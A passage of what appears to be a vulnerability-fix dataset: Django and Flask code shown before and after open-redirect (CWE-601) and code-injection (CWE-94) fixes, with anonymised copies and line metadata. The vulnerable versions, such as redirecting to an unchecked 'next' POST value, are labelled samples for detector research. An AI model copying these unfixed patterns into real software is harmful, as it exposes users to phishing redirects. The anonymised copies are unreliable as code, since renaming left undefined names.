@ratelimit(rate='2/10s')
def FUNC_3(VAR_7, VAR_9=RegistrationForm):
if VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse('spirit:VAR_18:update'))
VAR_17 = VAR_9(data=post_data(VAR_7))
if (is_post(VAR_7) and
not VAR_7.is_limited() and
VAR_17.is_valid()):
VAR_18 = VAR_17.save()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': VAR_17.get_email()})
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/FUNC_3.html',
context={'form': VAR_17})
def FUNC_4(VAR_7, VAR_10, VAR_11):
VAR_18 = get_object_or_404(VAR_0, VAR_10=pk)
VAR_19 = UserActivationTokenGenerator()
if VAR_19.is_valid(VAR_18, VAR_11):
VAR_18.st.is_verified = True
VAR_18.is_active = True
VAR_18.save()
messages.info(VAR_7, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
def FUNC_5(VAR_7):
if VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse('spirit:VAR_18:update'))
VAR_17 = ResendActivationForm(data=post_data(VAR_7))
if is_post(VAR_7):
if not VAR_7.is_limited() and VAR_17.is_valid():
VAR_18 = VAR_17.get_user()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/activation_resend.html',
context={'form': VAR_17})
| [
1,
2,
10,
21,
23,
24,
25,
32,
33,
37,
38,
41,
42,
45,
46,
49,
50,
51,
58,
59,
61,
63,
66,
69,
71,
72,
73,
77,
80,
82,
83,
88,
90,
91,
93,
97,
108,
109,
110,
111,
112,
113,
119,
120,
124,
130,
132,
133,
135,
139,
145,
146,
156
] | [
1,
2,
10,
22,
24,
25,
26,
33,
34,
38,
39,
42,
43,
46,
47,
50,
51,
52,
59,
60,
62,
64,
68,
71,
73,
74,
75,
79,
82,
84,
85,
90,
92,
93,
95,
99,
110,
111,
112,
113,
114,
115,
121,
122,
126,
132,
134,
135,
137,
141,
147,
148,
158
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect, get_object_or_404
from ...core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def create(request, comment_id):
comment = get_object_or_404(Comment, pk=comment_id)
form = FlagForm(
user=request.user,
comment=comment,
data=post_data(request))
if is_post(request) and form.is_valid():
form.save()
return redirect(request.POST.get('next', comment.get_absolute_url()))
return render(
request=request,
template_name='spirit/comment/flag/create.html',
context={
'form': form,
'comment': comment})
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def create(request, comment_id):
comment = get_object_or_404(Comment, pk=comment_id)
form = FlagForm(
user=request.user,
comment=comment,
data=post_data(request))
if is_post(request) and form.is_valid():
form.save()
return safe_redirect(request, 'next', comment.get_absolute_url(), method='POST')
return render(
request=request,
template_name='spirit/comment/flag/create.html',
context={
'form': form,
'comment': comment})
| open_redirect | {
"code": [
"from django.shortcuts import render, redirect, get_object_or_404",
"from ...core.utils.views import is_post, post_data",
" return redirect(request.POST.get('next', comment.get_absolute_url()))"
],
"line_no": [
4,
6,
21
]
} | {
"code": [
"from django.shortcuts import render, get_object_or_404",
"from spirit.core.utils.http import safe_redirect",
"from spirit.core.utils.views import is_post, post_data"
],
"line_no": [
4,
6,
7
]
} |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect, get_object_or_404
from ...core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_2 = get_object_or_404(Comment, pk=VAR_1)
VAR_3 = FlagForm(
user=VAR_0.user,
VAR_2=comment,
data=post_data(VAR_0))
if is_post(VAR_0) and VAR_3.is_valid():
VAR_3.save()
return redirect(VAR_0.POST.get('next', VAR_2.get_absolute_url()))
return render(
VAR_0=request,
template_name='spirit/VAR_2/flag/FUNC_0.html',
context={
'form': VAR_3,
'comment': VAR_2})
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_2 = get_object_or_404(Comment, pk=VAR_1)
VAR_3 = FlagForm(
user=VAR_0.user,
VAR_2=comment,
data=post_data(VAR_0))
if is_post(VAR_0) and VAR_3.is_valid():
VAR_3.save()
return safe_redirect(VAR_0, 'next', VAR_2.get_absolute_url(), method='POST')
return render(
VAR_0=request,
template_name='spirit/VAR_2/flag/FUNC_0.html',
context={
'form': VAR_3,
'comment': VAR_2})
| [
1,
2,
5,
9,
10,
18,
22,
29
] | [
1,
2,
5,
10,
11,
19,
23,
30
] |
4CWE-601
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g
from tinydb import TinyDB, Query, operations
from archivy.config import BaseHooks, Config
def load_config(path=""):
"""Loads `config.yml` file safely and deserializes it to a python dict."""
path = path or current_app.config["INTERNAL_DIR"]
with (Path(path) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def config_diff(curr_key, curr_val, parent_dict, defaults):
"""
This function diffs the user config with the defaults to only save what is actually different.
Returns 1 if the current element or its nested elements are different and have been preserved.
"""
if type(curr_val) is dict:
# the any call here diffs all nested children of the current dict and returns whether any have modifications
if not any(
[
config_diff(k, v, curr_val, defaults[curr_key])
for k, v in list(curr_val.items())
]
):
parent_dict.pop(curr_key)
return 0
else:
if defaults[curr_key] == curr_val:
parent_dict.pop(curr_key)
return 0
return 1
def write_config(config: dict):
"""
Writes a new config dict to a `config.yml` file that will override defaults.
Compares user config with defaults to only save changes.
"""
defaults = vars(Config())
for k, v in list(config.items()):
if k != "SECRET_KEY":
config_diff(k, v, config, defaults)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(config, f)
def load_hooks():
try:
user_hooks = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
user_locals = {}
exec(user_hooks.read(), globals(), user_locals)
user_hooks.close()
return user_locals.get("Hooks", BaseHooks)()
def load_scraper():
try:
user_scraping = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
user_locals = {}
exec(user_scraping.read(), globals(), user_locals)
user_scraping.close()
return user_locals.get("PATTERNS", {})
def get_db(force_reconnect=False):
"""
Returns the database object that you can use to
store data persistently
"""
if "db" not in g or force_reconnect:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def get_max_id():
"""Returns the current maximum id of dataobjs in the database."""
db = get_db()
max_id = db.search(Query().name == "max_id")
if not max_id:
db.insert({"name": "max_id", "val": 0})
return 0
return max_id[0]["val"]
def set_max_id(val):
"""Sets a new max_id"""
db = get_db()
db.update(operations.set("val", val), Query().name == "max_id")
def test_es_connection(es):
"""Tests health and presence of connection to elasticsearch."""
try:
health = es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if health["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def get_elastic_client(error_if_invalid=True):
"""Returns the elasticsearch client you can use to search and insert / delete data"""
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and error_if_invalid:
return None
auth_setup = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if auth_setup:
es = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
es = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if error_if_invalid:
test_es_connection(es)
else:
try:
es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return es
def create_plugin_dir(name):
"""Creates a sample plugin directory"""
raw_name = name.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{name}/{name}")
# Creates requirements.txt.
with open(f"{name}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
# Creates an empty readme file to be filled
with open(f"{name}/README.md", "w+") as fp:
fp.writelines(
[
f"# {name}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{name}`",
"\n\n## Usage",
]
)
# Creates a setup.py file
with open(f"{name}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{name}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{raw_name}={name}:{raw_name}"""\n)',
]
)
# Creating a basic __init__.py file where the main function of the plugin goes
with open(f"{name}/{name}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {raw_name}():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g, request
from tinydb import TinyDB, Query, operations
from urllib.parse import urlparse, urljoin
from archivy.config import BaseHooks, Config
def load_config(path=""):
"""Loads `config.yml` file safely and deserializes it to a python dict."""
path = path or current_app.config["INTERNAL_DIR"]
with (Path(path) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def config_diff(curr_key, curr_val, parent_dict, defaults):
"""
This function diffs the user config with the defaults to only save what is actually different.
Returns 1 if the current element or its nested elements are different and have been preserved.
"""
if type(curr_val) is dict:
# the any call here diffs all nested children of the current dict and returns whether any have modifications
if not any(
[
config_diff(k, v, curr_val, defaults[curr_key])
for k, v in list(curr_val.items())
]
):
parent_dict.pop(curr_key)
return 0
else:
if defaults[curr_key] == curr_val:
parent_dict.pop(curr_key)
return 0
return 1
def write_config(config: dict):
"""
Writes a new config dict to a `config.yml` file that will override defaults.
Compares user config with defaults to only save changes.
"""
defaults = vars(Config())
for k, v in list(config.items()):
if k != "SECRET_KEY":
config_diff(k, v, config, defaults)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(config, f)
def load_hooks():
try:
user_hooks = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
user_locals = {}
exec(user_hooks.read(), globals(), user_locals)
user_hooks.close()
return user_locals.get("Hooks", BaseHooks)()
def load_scraper():
try:
user_scraping = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
user_locals = {}
exec(user_scraping.read(), globals(), user_locals)
user_scraping.close()
return user_locals.get("PATTERNS", {})
def get_db(force_reconnect=False):
"""
Returns the database object that you can use to
store data persistently
"""
if "db" not in g or force_reconnect:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def get_max_id():
"""Returns the current maximum id of dataobjs in the database."""
db = get_db()
max_id = db.search(Query().name == "max_id")
if not max_id:
db.insert({"name": "max_id", "val": 0})
return 0
return max_id[0]["val"]
def set_max_id(val):
"""Sets a new max_id"""
db = get_db()
db.update(operations.set("val", val), Query().name == "max_id")
def test_es_connection(es):
"""Tests health and presence of connection to elasticsearch."""
try:
health = es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if health["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def get_elastic_client(error_if_invalid=True):
"""Returns the elasticsearch client you can use to search and insert / delete data"""
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and error_if_invalid:
return None
auth_setup = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if auth_setup:
es = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
es = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if error_if_invalid:
test_es_connection(es)
else:
try:
es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return es
def create_plugin_dir(name):
"""Creates a sample plugin directory"""
raw_name = name.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{name}/{name}")
# Creates requirements.txt.
with open(f"{name}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
# Creates an empty readme file to be filled
with open(f"{name}/README.md", "w+") as fp:
fp.writelines(
[
f"# {name}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{name}`",
"\n\n## Usage",
]
)
# Creates a setup.py file
with open(f"{name}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{name}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{raw_name}={name}:{raw_name}"""\n)',
]
)
# Creating a basic __init__.py file where the main function of the plugin goes
with open(f"{name}/{name}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {raw_name}():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
def is_safe_redirect_url(target):
host_url = urlparse(request.host_url)
redirect_url = urlparse(urljoin(request.host_url, target))
return (
redirect_url.scheme in ("http", "https")
and host_url.netloc == redirect_url.netloc
)
| open_redirect | {
"code": [
"from flask import current_app, g"
],
"line_no": [
8
]
} | {
"code": [
"from flask import current_app, g, request",
"def is_safe_redirect_url(target):",
" host_url = urlparse(request.host_url)",
" redirect_url = urlparse(urljoin(request.host_url, target))",
" return (",
" redirect_url.scheme in (\"http\", \"https\")",
" and host_url.netloc == redirect_url.netloc",
" )"
],
"line_no": [
8,
236,
237,
238,
239,
240,
241,
242
]
} | from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g
from tinydb import TinyDB, Query, operations
from archivy.config import BaseHooks, Config
def FUNC_0(VAR_0=""):
VAR_0 = path or current_app.config["INTERNAL_DIR"]
with (Path(VAR_0) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def FUNC_1(VAR_1, VAR_2, VAR_3, VAR_4):
if type(VAR_2) is dict:
if not any(
[
FUNC_1(k, v, VAR_2, VAR_4[VAR_1])
for k, v in list(VAR_2.items())
]
):
VAR_3.pop(VAR_1)
return 0
else:
if VAR_4[VAR_1] == VAR_2:
VAR_3.pop(VAR_1)
return 0
return 1
def FUNC_2(VAR_5: dict):
VAR_4 = vars(Config())
for k, v in list(VAR_5.items()):
if k != "SECRET_KEY":
FUNC_1(k, v, VAR_5, VAR_4)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(VAR_5, f)
def FUNC_3():
try:
VAR_16 = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
VAR_11 = {}
exec(VAR_16.read(), globals(), VAR_11)
VAR_16.close()
return VAR_11.get("Hooks", BaseHooks)()
def FUNC_4():
try:
VAR_17 = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
VAR_11 = {}
exec(VAR_17.read(), globals(), VAR_11)
VAR_17.close()
return VAR_11.get("PATTERNS", {})
def FUNC_5(VAR_6=False):
if "db" not in g or VAR_6:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def FUNC_6():
VAR_12 = FUNC_5()
VAR_13 = VAR_12.search(Query().name == "max_id")
if not VAR_13:
VAR_12.insert({"name": "max_id", "val": 0})
return 0
return VAR_13[0]["val"]
def FUNC_7(VAR_7):
VAR_12 = FUNC_5()
VAR_12.update(operations.set("val", VAR_7), Query().name == "max_id")
def FUNC_8(VAR_8):
try:
VAR_18 = VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if VAR_18["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def FUNC_9(VAR_9=True):
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and VAR_9:
return None
VAR_14 = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if VAR_14:
VAR_8 = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
VAR_8 = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if VAR_9:
FUNC_8(VAR_8)
else:
try:
VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return VAR_8
def FUNC_10(VAR_10):
VAR_15 = VAR_10.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{VAR_10}/{VAR_10}")
with open(f"{VAR_10}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
with open(f"{VAR_10}/README.md", "w+") as fp:
fp.writelines(
[
f"# {VAR_10}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{VAR_10}`",
"\n\n## Usage",
]
)
with open(f"{VAR_10}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{VAR_10}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{VAR_15}={VAR_10}:{VAR_15}"""\n)',
]
)
with open(f"{VAR_10}/{VAR_10}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {VAR_15}():",
"\n\tpass",
f"\n\n@{VAR_15}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{VAR_15}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g, request
from tinydb import TinyDB, Query, operations
from urllib.parse import urlparse, urljoin
from archivy.config import BaseHooks, Config
def FUNC_0(VAR_0=""):
VAR_0 = path or current_app.config["INTERNAL_DIR"]
with (Path(VAR_0) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def FUNC_1(VAR_1, VAR_2, VAR_3, VAR_4):
if type(VAR_2) is dict:
if not any(
[
FUNC_1(k, v, VAR_2, VAR_4[VAR_1])
for k, v in list(VAR_2.items())
]
):
VAR_3.pop(VAR_1)
return 0
else:
if VAR_4[VAR_1] == VAR_2:
VAR_3.pop(VAR_1)
return 0
return 1
def FUNC_2(VAR_5: dict):
VAR_4 = vars(Config())
for k, v in list(VAR_5.items()):
if k != "SECRET_KEY":
FUNC_1(k, v, VAR_5, VAR_4)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(VAR_5, f)
def FUNC_3():
try:
VAR_19 = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
VAR_12 = {}
exec(VAR_19.read(), globals(), VAR_12)
VAR_19.close()
return VAR_12.get("Hooks", BaseHooks)()
def FUNC_4():
try:
VAR_20 = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
VAR_12 = {}
exec(VAR_20.read(), globals(), VAR_12)
VAR_20.close()
return VAR_12.get("PATTERNS", {})
def FUNC_5(VAR_6=False):
if "db" not in g or VAR_6:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def FUNC_6():
VAR_13 = FUNC_5()
VAR_14 = VAR_13.search(Query().name == "max_id")
if not VAR_14:
VAR_13.insert({"name": "max_id", "val": 0})
return 0
return VAR_14[0]["val"]
def FUNC_7(VAR_7):
VAR_13 = FUNC_5()
VAR_13.update(operations.set("val", VAR_7), Query().name == "max_id")
def FUNC_8(VAR_8):
try:
VAR_21 = VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if VAR_21["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def FUNC_9(VAR_9=True):
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and VAR_9:
return None
VAR_15 = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if VAR_15:
VAR_8 = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
VAR_8 = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if VAR_9:
FUNC_8(VAR_8)
else:
try:
VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return VAR_8
def FUNC_10(VAR_10):
VAR_16 = VAR_10.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{VAR_10}/{VAR_10}")
with open(f"{VAR_10}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
with open(f"{VAR_10}/README.md", "w+") as fp:
fp.writelines(
[
f"# {VAR_10}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{VAR_10}`",
"\n\n## Usage",
]
)
with open(f"{VAR_10}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{VAR_10}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{VAR_16}={VAR_10}:{VAR_16}"""\n)',
]
)
with open(f"{VAR_10}/{VAR_10}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {VAR_16}():",
"\n\tpass",
f"\n\n@{VAR_16}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{VAR_16}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
def FUNC_11(VAR_11):
VAR_17 = urlparse(request.host_url)
VAR_18 = urlparse(urljoin(request.host_url, VAR_11))
return (
VAR_18.scheme in ("http", "https")
and VAR_17.netloc == VAR_18.netloc
)
| [
4,
10,
12,
13,
19,
20,
24,
28,
42,
43,
55,
56,
62,
67,
68,
78,
79,
87,
89,
90,
99,
100,
105,
106,
122,
129,
130,
138,
161,
162,
168,
169,
172,
173,
184,
185,
210,
211,
229,
233,
15,
22,
23,
24,
25,
26,
45,
46,
47,
48,
81,
82,
83,
84,
92,
102,
108,
132,
164
] | [
4,
11,
13,
14,
20,
21,
25,
29,
43,
44,
56,
57,
63,
68,
69,
79,
80,
88,
90,
91,
100,
101,
106,
107,
123,
130,
131,
139,
162,
163,
169,
170,
173,
174,
185,
186,
211,
212,
230,
234,
235,
243,
16,
23,
24,
25,
26,
27,
46,
47,
48,
49,
82,
83,
84,
85,
93,
103,
109,
133,
165
] |
5CWE-94
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import openapi_python_client.schema as oai
from openapi_python_client import GeneratorError
from openapi_python_client.parser.errors import ParseError
MODULE_NAME = "openapi_python_client.parser.openapi"
class TestGeneratorData:
def test_from_dict(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
EndpointCollection = mocker.patch(f"{MODULE_NAME}.EndpointCollection")
OpenAPI = mocker.patch(f"{MODULE_NAME}.oai.OpenAPI")
openapi = OpenAPI.parse_obj.return_value
in_dict = mocker.MagicMock()
get_all_enums = mocker.patch(f"{MODULE_NAME}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
OpenAPI.parse_obj.assert_called_once_with(in_dict)
Schemas.build.assert_called_once_with(schemas=openapi.components.schemas)
EndpointCollection.from_data.assert_called_once_with(data=openapi.paths)
get_all_enums.assert_called_once_with()
assert generator_data == GeneratorData(
title=openapi.info.title,
description=openapi.info.description,
version=openapi.info.version,
endpoint_collections_by_tag=EndpointCollection.from_data.return_value,
schemas=Schemas.build.return_value,
enums=get_all_enums.return_value,
)
# Test no components
openapi.components = None
Schemas.build.reset_mock()
generator_data = GeneratorData.from_dict(in_dict)
Schemas.build.assert_not_called()
assert generator_data.schemas == Schemas()
def test_from_dict_invalid_schema(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
in_dict = {}
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
